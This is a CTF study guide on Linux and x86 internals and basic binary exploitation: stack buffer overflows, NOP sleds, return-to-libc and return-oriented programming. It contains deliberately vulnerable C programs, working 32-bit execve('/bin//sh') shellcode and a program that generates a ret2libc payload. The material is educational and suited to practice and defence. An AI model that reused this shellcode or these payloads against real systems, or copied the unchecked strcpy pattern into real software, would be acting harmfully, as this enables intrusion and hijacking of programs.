CTF basics!

Quick Reference for most basic CTFs

Basic Syscalls

fork creates a new process by duplicating the calling process, while exec replaces the current process image with a new program.
The child created by fork gets its own copy of the parent's address space (implemented as copy-on-write on Linux), while exec discards the calling process's memory image and loads the new program in its place, keeping the same process ID.
fork returns twice: the child's process ID in the parent and 0 in the child. exec does not return on success; it returns -1 only if the new program could not be started.
The two are usually used together: a process calls fork, and the child then calls exec to run a different program. This is how a shell launches commands.
The exec family includes several variants, such as execl, execv, execle, and execvp, which differ in how they accept arguments (list or array), whether they take an environment, and whether they search PATH for the new program.
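
The fork-then-exec pattern described above can be sketched as follows. This is a minimal illustration, not taken from any particular challenge: the helper name run_program is hypothetical, and it assumes a POSIX system.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run a program in a child process and return its
 * exit status. Returns 127 if the program could not be executed and -1
 * if fork or waitpid failed or the child did not exit normally. */
int run_program(const char *file, char *const argv[]) {
    assert(file != NULL && argv != NULL);

    pid_t pid = fork();            /* duplicate the calling process */
    if (pid < 0) {
        return -1;                 /* fork failed: no child was created */
    }
    if (pid == 0) {
        /* Child: fork returned 0. Replace this process image. */
        execvp(file, argv);        /* searches PATH; returns only on failure */
        _exit(127);                /* reached only if execvp failed */
    }

    /* Parent: fork returned the child's PID. Wait for the child to finish. */
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Calling run_program("sh", argv) with argv set to {"sh", "-c", "exit 7", NULL} should return 7 in the parent, because the child's process image was replaced by sh and the parent collected its exit status.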

PLTs and GOTs

PLT stands for Procedure Linkage Table, and it is a data structure used in dynamic linking to call functions in shared libraries.
GOT stands for Global Offset Table, and it is another data structure used in dynamic linking to resolve the addresses of functions and data objects in shared libraries.
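When a program calls a function in a shared library, the call goes to a small stub in the PLT, which jumps to the address stored in that function's GOT entry. With lazy binding, the entry initially points back into the PLT, so the first call lands in the dynamic linker, which resolves the real address and writes it into the GOT; later calls jump straight to the function.
The static linker creates the PLT and GOT when the binary is built, and the dynamic linker fills in the GOT at run time. The PLT is read-only executable code, but the GOT holds data and stays writable unless full RELRO is enabled, which is why overwriting a GOT entry is a common CTF technique.
This indirection lets library code be position-independent, so a single copy of a shared library can be mapped into many processes at different addresses, improving memory efficiency.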
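
Lazy binding can be modeled in plain C with a table of function pointers. This is only a toy model of the idea, not how the dynamic linker is implemented; every name in it (toy_got, resolver_stub, call_double_via_plt) is made up for illustration.

```c
#include <assert.h>
#include <stddef.h>

typedef int (*func_ptr)(int);

/* The "real" library function that callers ultimately want. */
static int library_double(int x) { return 2 * x; }

static int resolver_stub(int x);

/* Toy GOT: one writable slot that starts out pointing at the resolver. */
static func_ptr toy_got[1] = { resolver_stub };
static int resolve_count = 0;

/* Toy resolver: look up the target once, patch the slot, forward the call. */
static int resolver_stub(int x) {
    resolve_count++;
    toy_got[0] = library_double;   /* later calls skip the resolver */
    return toy_got[0](x);
}

/* Toy PLT stub: callers always jump through the slot, never directly. */
int call_double_via_plt(int x) {
    assert(toy_got[0] != NULL);
    return toy_got[0](x);
}

/* How many times the resolver has run so far. */
int toy_resolve_count(void) { return resolve_count; }
```

The first call to call_double_via_plt goes through the resolver, and every later call goes straight to library_double. The model also shows why a writable slot is attractive to an attacker: whoever can overwrite toy_got[0] decides where the next call goes.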

x86 Stacks:

Each thread on an x86 system normally has two stacks, set up by the operating system: a user stack and a kernel stack.
The user stack holds local variables, function arguments, and return addresses while the thread runs in user mode.
The kernel stack is used instead while the thread runs kernel code, for example during a system call or an interrupt.
Both stacks grow downward in memory; the stack pointer holds the address of the top of the stack, which is the lowest address in use.
The stack pointer is kept in the ESP (Extended Stack Pointer) register, or RSP on x86-64.
Pushing data onto the stack decreases ESP (by 4 bytes for a 32-bit value), while popping data off the stack increases it.
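
The effect of push and pop on the stack pointer can be simulated in a few lines. This is a toy model with made-up names (toy_stack, toy_push, toy_pop) in which esp is an offset into a small array rather than a real register.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOY_STACK_SIZE 64

/* Toy model of a 32-bit stack: memory plus an ESP value indexing into it. */
struct toy_stack {
    uint8_t  mem[TOY_STACK_SIZE];
    uint32_t esp;                  /* offset of the current top of the stack */
};

void toy_init(struct toy_stack *s) {
    memset(s->mem, 0, sizeof s->mem);
    s->esp = TOY_STACK_SIZE;       /* empty stack: ESP sits at the highest address */
}

/* push: ESP decreases by 4, then the value is stored at the new top. */
void toy_push(struct toy_stack *s, uint32_t value) {
    assert(s->esp >= 4);
    s->esp -= 4;
    memcpy(&s->mem[s->esp], &value, 4);
}

/* pop: the value at the top is read, then ESP increases by 4. */
uint32_t toy_pop(struct toy_stack *s) {
    uint32_t value;
    assert(s->esp + 4 <= TOY_STACK_SIZE);
    memcpy(&value, &s->mem[s->esp], 4);
    s->esp += 4;
    return value;
}
```

After toy_init, esp is 64. Two pushes bring it down to 56, and two pops return the values in reverse order and bring it back up to 64.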

x86 Registers:

The x86 architecture has several types of registers, including general-purpose, segment, and control registers.
General-purpose registers are used for arithmetic, logic, and addressing; in 32-bit mode they are EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP.
The instruction pointer (EIP, or RIP on x86-64) holds the memory address of the next instruction to be executed. Controlling it is the goal of most of the attacks below.
Segment registers (CS, DS, SS, ES, FS, GS) are used to point to different segments of memory, such as code or data segments.
The flags register (EFLAGS) contains status flags, such as zero, carry, and sign, that record the result of arithmetic and logic operations. Control registers, such as CR0 and CR3, configure system behavior like paging and protection and are accessible only to the kernel.
The x86 architecture also includes several special registers, such as the floating-point unit (FPU) register stack and the debug registers, which are used for hardware breakpoints.
On x86-64 the general-purpose registers are 64 bits wide and their names start with R:
- RAX (accumulator): arithmetic operations and function return values.
- RBX (base): memory addressing and general-purpose use.
- RCX (counter): loop iterations and function arguments.
- RDX (data): arithmetic operations and general-purpose use.
- RSI (source index): string operations and memory addressing.
- RDI (destination index): string operations and memory addressing.
- RBP (base pointer): accessing function parameters and local variables on the stack.
- RSP (stack pointer): points to the top of the stack.

Stack vs. Heap

| Property | Stack | Heap |
| --- | --- | --- |
| Purpose | Function call frames: local variables, arguments, return addresses | Dynamic memory allocation |
| Data structure | Last In First Out (LIFO) | No fixed order; blocks are allocated and freed in any order |
| Memory allocation | Automatic | Manual, by the programmer (malloc/free) or a runtime |
| Allocation/deallocation time | Very fast | Slower than stack |
| Size limit | Fixed limit, smaller than the heap | No fixed limit, larger than the stack |
| Access speed | Fastest | Slower than stack |
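
The difference in lifetime and ownership can be seen in a short sketch. The function names are made up for illustration; the only library calls used are the standard malloc, memcpy, strncpy, and strlen.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Stack: 'local' lives in this call's frame and is released automatically
 * when the function returns. */
size_t length_via_stack_copy(const char *text) {
    char local[32];
    assert(text != NULL);
    strncpy(local, text, sizeof local - 1);   /* bounded copy */
    local[sizeof local - 1] = '\0';
    return strlen(local);
}

/* Heap: the copy outlives this call; the caller must free() it. */
char *heap_copy(const char *text) {
    assert(text != NULL);
    size_t n = strlen(text) + 1;
    char *copy = malloc(n);
    if (copy != NULL) {
        memcpy(copy, text, n);
    }
    return copy;
}
```

A pointer to local must never be returned from length_via_stack_copy, because the frame is gone after the return. The pointer from heap_copy stays valid until the caller passes it to free().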

Stack overflows

This is the most basic type of attack you must understand, so do not skip it! A stack overflow (more precisely, a stack buffer overflow) is a type of buffer overflow. Every process has a memory map with four main areas: application, heap, libraries, and stack. Every function call gets its own stack frame: RBP points to the base of the current frame and RSP to the top of the stack. On x86 the stack grows in one direction only: downward, toward lower addresses.

Buffer overflow attacks occur when an attacker sends more data than a program has allocated memory for, which overwrites adjacent memory. On the stack, that adjacent memory includes the saved return address. Here is how a buffer overflow attack works on the stack, using a simple C example:

In C, the stack stores local variables, saved registers, and return addresses. It grows downward from high memory addresses to low memory addresses, but writes into a buffer move upward, toward the saved return address.
A buffer is a region of memory that holds a fixed amount of data. When a program copies more input into it than it can hold, the extra bytes spill into whatever lies after it.
An attacker can exploit this by overwriting the return address, which alters the program's control flow and can lead to the execution of injected or existing code.
Here is an example vulnerable program in C:

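#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: for practice only. */
void vulnerable_function(const char *input) {
    char buffer[10];
    strcpy(buffer, input);  /* no bounds check: long input overflows buffer */
    printf("Input: %s\n", buffer);
}

int main(void) {
    char input[64];
    printf("Enter input: ");
    /* gets() was removed in C11; fgets() keeps the read itself within bounds. */
    if (fgets(input, sizeof input, stdin) == NULL) {
        return 1;
    }
    vulnerable_function(input);
    return 0;
}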

In this program, vulnerable_function() copies the input string into a buffer that is only 10 bytes long. If the input is longer than 9 characters (plus the terminating null byte), strcpy writes past the end of the buffer and overwrites adjacent memory, eventually reaching the saved return address.

An attacker can send a payload to exploit this vulnerability, such as:

char payload[] = "AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde";

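In this payload, the 20 A characters fill the 10-byte buffer and the stack space between it and the saved return address; the exact distance depends on the compiler and architecture, so confirm it in a debugger. The last four bytes, \xef\xbe\xad\xde, are the address 0xdeadbeef in little-endian byte order, and they overwrite the return address.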
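
The last four bytes of that payload are the value 0xdeadbeef stored least significant byte first. A minimal sketch of that packing, with helper names (pack_le32, unpack_le32) chosen for illustration:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Store a 32-bit value in little-endian order: least significant byte first. */
void pack_le32(uint32_t value, unsigned char out[4]) {
    assert(out != NULL);
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Rebuild the 32-bit value from four little-endian bytes. */
uint32_t unpack_le32(const unsigned char in[4]) {
    assert(in != NULL);
    return (uint32_t)in[0]
         | ((uint32_t)in[1] << 8)
         | ((uint32_t)in[2] << 16)
         | ((uint32_t)in[3] << 24);
}
```

Packing 0xdeadbeef yields the bytes ef be ad de, which is exactly the tail of the payload string.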

An attacker can send the payload to the program via input. When vulnerable_function() returns, the program jumps to the overwritten address:

Enter input: AAAAAAAAAAAAAAAAAAAA����
Segmentation fault

In this case, the program crashes with a segmentation fault because 0xdeadbeef is not a valid code address. With the address of attacker-controlled code in its place, the same technique executes arbitrary code, which can be malicious and damaging. I’ve kept the example short, but a real exploit would typically point the return address at shellcode that spawns /bin/sh.

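Little Endian: I’m not talking about my little brother. Little endian is the odd-looking byte order x86 uses for multi-byte values: the least significant byte is stored first, so the address 0xdeadbeef is written as \xef\xbe\xad\xde. The following is classic 32-bit Linux shellcode that runs /bin/sh; the path is pushed onto the stack as the 4-byte chunks //sh and /bin.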

/* 23-byte 32-bit Linux shellcode: execve("/bin//sh") via int 0x80 */
const char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
                        "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

👉 Reiterating!

1. The attacker identifies where the saved return address sits on the stack relative to the buffer. This address controls where execution continues after the vulnerable function completes.
2. The attacker prepares a payload that includes a NOP sled followed by shellcode. A NOP sled is a run of no-operation instructions (\x90 bytes) placed in front of the shellcode. It gives the overwritten return address a wide landing zone: execution that lands anywhere in the sled slides forward into the shellcode, so the address does not have to be exact.
3. The attacker calculates the number of NOP bytes needed. Let's say the shellcode is 23 bytes long, and the return address is located 32 bytes after the start of the buffer. Then 9 NOP bytes followed by the shellcode exactly fill the space before the return address (32 bytes - 23 bytes = 9 bytes).
4. The attacker constructs the payload: the NOP sled, then the shellcode, then the new return address, which points into the NOP sled inside the buffer. Any leftover space before the return address can be filled with A characters (or any other character that is easy to identify in the debugger).
5. The attacker sends the payload to the program, which copies the input string into the buffer and overwrites the return address with the address of the NOP sled.
6. When the vulnerable function returns, it jumps to the overwritten address, runs through the NOP sled, and reaches the shellcode. The shellcode then executes, allowing the attacker to take control of the program. This only works if the stack is executable.
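
The layout arithmetic in the steps above can be sketched as a small function. This is an illustration under stated assumptions: a 32-bit target, a known offset to the return address, and a hypothetical helper name build_payload. The return address passed in is whatever the debugger shows for the start of the buffer.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Lay out: [NOP sled][shellcode][4-byte little-endian return address].
 * 'offset' is the distance from the buffer start to the saved return address.
 * Returns the total payload length, or 0 if the arguments do not fit. */
size_t build_payload(unsigned char *out, size_t out_size, size_t offset,
                     const unsigned char *code, size_t code_len,
                     uint32_t ret_addr) {
    assert(out != NULL && code != NULL);
    if (code_len > offset || offset + 4 > out_size) {
        return 0;
    }

    size_t sled_len = offset - code_len;      /* e.g. 32 - 23 = 9 */
    memset(out, 0x90, sled_len);              /* NOP sled */
    memcpy(out + sled_len, code, code_len);   /* shellcode ends right before the return address */
    for (int i = 0; i < 4; i++) {             /* return address, least significant byte first */
        out[offset + i] = (unsigned char)((ret_addr >> (8 * i)) & 0xff);
    }
    return offset + 4;
}
```

With offset 32 and 23 bytes of code, the function writes 9 NOP bytes, the code, and the 4 address bytes, for a total of 36 bytes.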

Ret2Libc: What if there’s an exit(0)

Return-to-libc is a technique for exploiting vulnerabilities that let an attacker control the contents of the program's stack even when injected code cannot be executed, for example because the stack is non-executable. The basic idea is to use code that is already in the process, specifically functions in the libc library, to perform the attacker's desired actions.

Example: If the vulnerable function calls exit() instead of returning, overwriting its return address is not enough by itself, because exit() never returns and the overwritten address is never used. To gain control, the attacker has to corrupt something the program uses before it terminates, for example the GOT entry for exit() when the GOT is writable.

Here is the earlier program modified so that the vulnerable function ends with an exit() call:

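#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Deliberately vulnerable: for practice only. */
void vulnerable_function(const char *input) {
    char buffer[10];
    strcpy(buffer, input);  /* no bounds check: long input overflows buffer */
    printf("Input: %s\n", buffer);
    exit(0); /* the function exits here and never returns */
}

int main(void) {
    char input[64];
    printf("Enter input: ");
    /* gets() was removed in C11; fgets() keeps the read itself within bounds. */
    if (fgets(input, sizeof input, stdin) == NULL) {
        return 1;
    }
    vulnerable_function(input);
    return 0;
}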

In this modified program, vulnerable_function() ends with an exit(0) call, so it never executes its own return instruction. The overflow still corrupts the stack, but a saved return address only matters in a function that actually returns.

When the function does return, as in the first example, the attacker can use a "return-to-libc" attack. This type of attack replaces the return address on the stack with the address of a function in a shared library, such as system() or execve(), so that a command runs without any injected shellcode. Here is an example payload that would execute /bin/sh using the system() function:

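#include <stdio.h>
#include <string.h>

int main(void) {
    /* 32-bit x86 layout. All addresses are placeholders: find the real ones in a debugger. */
    const char payload[] =
        "AAAAAAAAAAAAAAAAAAAABBBBCCCC"  /* 28 bytes of padding up to the saved return address */
        "\x18\xa0\x04\x08"              /* address of system(), here 0x0804a018 */
        "\xed\x1d\x83\x04"              /* where system() returns to, here 0x04831ded */
        "DDDD"                          /* placeholder for the address of the string below */
        "/bin/sh";                      /* the command string itself */
    fprintf(stderr, "Payload length: %zu\n", strlen(payload));
    fwrite(payload, 1, strlen(payload), stdout);  /* pipe this into the target's input */
    return 0;
}

This program does not run the payload; it writes the bytes to standard output so they can be piped into the vulnerable program. In this payload, the first 28 bytes (the A, B, and C characters) are padding that fills the buffer and the stack space up to the saved return address. The next 4 bytes overwrite the return address with the address of the system() function in libc (this address can be obtained using a debugger or other tools). The 4 bytes after that are the address system() returns to when it finishes. Then comes the argument to system(), which must be a pointer to the string /bin/sh (shown here as the placeholder DDDD), followed by the string itself.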

When the payload is sent to a vulnerable function that returns, it overflows the buffer and overwrites the return address on the stack with the address of the system() function. On return, system() is called with /bin/sh as its argument and starts a shell with the privileges of the vulnerable process (root only if the program runs as root or is setuid root).

So, in summary: an exit() call before the return means the overwritten return address is never used, and the attacker must hijack something that runs before the program terminates. When the vulnerable function does return, a return-to-libc payload redirects execution to an existing libc function instead of to injected shellcode.

Another example: Let's say we have a vulnerable program that takes input from the user and passes it to a function called strcpy without any bounds checking. This creates a buffer overflow vulnerability that we can exploit.

Our goal is to execute a command on the system using the system function from the libc library, with our own argument string. However, we can't inject any code of our own.

Instead, we can use the buffer overflow to overwrite the return address on the stack, which determines where the program jumps when the function that called strcpy returns. We can set the return address to point to the system function in the libc library, and arrange the stack to include a pointer to our desired argument string.

So, when the vulnerable function returns, the program jumps to the system function instead of continuing with its normal execution. The system function then executes the command we specified with our argument string.

This attack works because the system function and other useful functions like execve live in the libc library, which is linked into virtually all programs, so the code is already in memory and marked executable. That is why return-to-libc defeats non-executable stacks. Modern defenses such as ASLR, which randomizes where libc is loaded, and stack canaries, which detect the overwrite before the function returns, make return-to-libc attacks much more difficult to carry out.

Return Oriented Programming: Corrupting return address

Return Oriented Programming (ROP) is a technique used by attackers to execute code in a program by chaining together small snippets of existing code called "gadgets". These gadgets end with a "return" instruction, hence the name "return-oriented" programming. By stringing together a series of these gadgets, an attacker can perform arbitrary computation without injecting any new instructions.

Here is a simple example of ROP:

Let's say we have a vulnerable program that takes input from the user and stores it in a buffer without proper bounds checking. The attacker can overflow the buffer with a string of their choice and overwrite the return address on the stack with the address of a gadget in the program. This gadget could be a small piece of code that performs a useful operation, such as writing a specific value to a certain memory location.

Next, the attacker places the addresses of further gadgets on the stack right after the first one. Each gadget ends with a "return" instruction, which pops the next address off the stack and jumps to it, so the gadgets run one after another. By chaining together a series of gadgets, the attacker can perform their intended malicious action, such as spawning a shell or stealing sensitive information.

For example, let's say the vulnerable program contains the gadgets "pop eax; ret", "pop ebx; ret", and "int 0x80". The attacker overwrites the return address on the stack with the address of the first gadget, followed by the value to load into eax, then the address of the second gadget and the value for ebx, and finally the address of "int 0x80". With eax set to 11 (execve on 32-bit Linux) and ebx pointing to the string /bin/sh, and ecx and edx set up the same way, the final gadget spawns a shell.
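
How a chain of gadget addresses and data words drives execution can be shown with a toy interpreter. Nothing here touches a real stack or real gadgets: the gadget "addresses" are made-up constants, and the struct and function names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy CPU state: two registers, a cursor into the chain, and a syscall flag. */
struct toy_cpu {
    uint32_t eax, ebx;
    const uint32_t *sp;       /* next word to pop */
    const uint32_t *end;      /* one past the last word of the chain */
    int syscall_made;
};

/* Hypothetical gadget "addresses". */
enum { G_POP_EAX = 1, G_POP_EBX = 2, G_SYSCALL = 3 };

static uint32_t pop_word(struct toy_cpu *cpu) {
    assert(cpu->sp < cpu->end);
    return *cpu->sp++;
}

/* Run the chain: each "ret" pops the next gadget address,
 * and each pop gadget consumes one data word. */
void run_chain(struct toy_cpu *cpu, const uint32_t *chain, size_t words) {
    cpu->eax = 0;
    cpu->ebx = 0;
    cpu->sp = chain;
    cpu->end = chain + words;
    cpu->syscall_made = 0;
    while (cpu->sp < cpu->end && !cpu->syscall_made) {
        switch (pop_word(cpu)) {   /* the "ret" that ends the previous gadget */
        case G_POP_EAX: cpu->eax = pop_word(cpu); break;  /* pop eax; ret */
        case G_POP_EBX: cpu->ebx = pop_word(cpu); break;  /* pop ebx; ret */
        case G_SYSCALL: cpu->syscall_made = 1;    break;  /* int 0x80 */
        default: return;           /* unknown address: a real program would crash */
        }
    }
}
```

Running the chain { G_POP_EAX, 11, G_POP_EBX, 0x1234, G_SYSCALL } leaves eax at 11 and ebx at 0x1234 when the "syscall" fires, which mirrors how the stack contents alone decide what the gadgets do.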
